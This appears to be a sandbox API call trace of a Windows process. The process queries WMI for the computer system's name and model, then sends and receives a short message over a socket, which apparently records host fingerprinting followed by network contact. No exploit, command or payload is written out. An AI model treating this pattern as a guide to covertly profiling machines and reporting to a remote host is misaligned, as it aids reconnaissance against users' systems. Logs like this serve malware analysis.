	[0199.738] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0199.738] IUnknown:QueryInterface (in: This=0x1cd1c960, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd1c968) returned 0x0
	[0199.739] IMarshal:GetUnmarshalClass (in: This=0x1cd1c968, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0199.739] IUnknown:Release (This=0x1cd1c968) returned 0x3
	[0199.739] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0199.739] IUnknown:AddRef (This=0x1cd1c960) returned 0x4
	[0199.739] IUnknown:QueryInterface (in: This=0x1cd1c960, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0199.739] IUnknown:Release (This=0x1cd1c960) returned 0x3
	[0199.739] IUnknown:Release (This=0x1cd1c960) returned 0x2
	[0199.739] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0199.739] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0199.739] IUnknown:AddRef (This=0x1cd1c960) returned 0x3
	[0199.739] IUnknown:QueryInterface (in: This=0x1cd1c960, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd1c960) returned 0x0
	[0199.740] IUnknown:Release (This=0x1cd1c960) returned 0x3
	[0199.740] IUnknown:Release (This=0x1cd1c960) returned 0x2
	[0199.740] IUnknown:Release (This=0x1cd1c960) returned 0x1
	[0199.740] CoTaskMemFree (pv=0x1b84ab50) 
	[0199.740] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0199.740] IUnknown:AddRef (This=0x1cd1c960) returned 0x2
	[0199.740] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0199.740] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0199.740] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0199.741] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0199.741] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0199.741] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0199.741] IUnknown:Release (This=0x321868) returned 0x1
	[0199.742] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd11a60) returned 0x0
	[0199.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11a60, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
	[0199.742] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11a60, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd15ae0) returned 0x0
	[0199.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ae0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd15ae0) returned 0x0
	[0199.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ae0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0199.743] WbemDefPath:IUnknown:AddRef (This=0x1cd15ae0) returned 0x3
	[0199.743] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0199.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ae0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b83aaa0) returned 0x0
	[0199.743] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b83aaa0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.743] WbemDefPath:IUnknown:Release (This=0x1b83aaa0) returned 0x3
	[0199.743] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0199.743] WbemDefPath:IUnknown:AddRef (This=0x1cd15ae0) returned 0x4
	[0199.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ae0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0199.744] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x3
	[0199.744] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x2
	[0199.744] WbemDefPath:IUnknown:Release (This=0x1cd11a60) returned 0x0
	[0199.744] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x1
	[0199.744] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0199.744] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0199.744] WbemDefPath:IUnknown:AddRef (This=0x1cd15ae0) returned 0x2
	[0199.744] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ae0, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd15ae0) returned 0x0
	[0199.744] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x2
	[0199.745] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x1
	[0199.745] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0199.745] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0199.745] WbemDefPath:IUnknown:AddRef (This=0x1cd15ae0) returned 0x2
	[0199.745] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ae0, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd15ae0) returned 0x0
	[0199.745] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x2
	[0199.745] WbemDefPath:IUnknown:AddRef (This=0x1cd15ae0) returned 0x3
	[0199.745] WbemDefPath:IWbemPath:SetText (This=0x1cd15ae0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0199.745] WbemDefPath:IUnknown:Release (This=0x1cd15ae0) returned 0x2
	[0199.745] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0199.745] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0199.745] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.746] CoTaskMemAlloc (cb=0x8) returned 0x1b84ab50
	[0199.746] IEnumWbemClassObject:Next (in: This=0x1cd1c8b8, lTimeout=-1, uCount=0x1, apObjects=0x1b84ab50, puReturned=0x1c6ece78 | out: apObjects=0x1b84ab50*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0199.746] CoTaskMemFree (pv=0x1b84ab50) 
	[0199.746] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0199.747] WbemLocator:IUnknown:Release (This=0x1b849bb0) returned 0x1
	[0199.747] IUnknown:Release (This=0x1cd1c8b8) returned 0x0
	[0199.749] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0199.749] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0199.749] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.749] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0199.749] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0199.749] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0199.749] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0199.750] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0199.750] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0199.750] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.750] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0199.750] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0199.750] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0199.750] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0199.750] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0199.750] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0199.751] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.751] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0199.751] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0199.751] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.751] IWbemClassObject:GetNames (in: This=0x1cd1c960, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecea0 | out: pNames=0x1c6ecea0*="\x01ƀ\x08") returned 0x0
	[0199.751] SafeArrayGetDim (psa=0x1b8328a0) returned 0x1
	[0199.751] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__GENUS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.752] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__CLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.752] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0199.752] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.752] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.752] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0199.752] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.752] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0199.753] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.753] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b8328a0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b84ab40, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c6ece9c*=8200, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.753] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__SERVER", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.753] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0199.753] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.753] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0199.754] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="__PATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0199.754] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0199.754] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ecf40 | out: puCount=0x1c6ecf40*=0x2) returned 0x0
	[0199.754] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecf40*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf40*=0x17, pszText=0x0) returned 0x0
	[0199.754] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecf40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.754] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="Model", lFlags=0, pVal=0x1c6ecf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf2c*=0, plFlavor=0x1c6ecf28*=0 | out: pVal=0x1c6ecf30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x1c6ecf2c*=8, plFlavor=0x1c6ecf28*=32) returned 0x0
	[0199.754] SysStringLen (param_1="M5X0JE") returned 0x6
	[0199.754] IWbemClassObject:Get (in: This=0x1cd1c960, wszName="Model", lFlags=0, pVal=0x1c6ed160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ed15c*=8, plFlavor=0x1c6ed158*=32 | out: pVal=0x1c6ed160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x1c6ed15c*=8, plFlavor=0x1c6ed158*=32) returned 0x0
	[0199.754] SysStringLen (param_1="M5X0JE") returned 0x6
	[0199.756] send (s=0x414, buf=0x30dbbd8*, len=26, flags=0) returned 26
	[0199.756] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 136
	[0200.108] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0200.109] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0200.110] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0200.110] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0200.110] IUnknown:Release (This=0x321868) returned 0x1
	[0200.111] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd11b40) returned 0x0
	[0200.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11b40, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
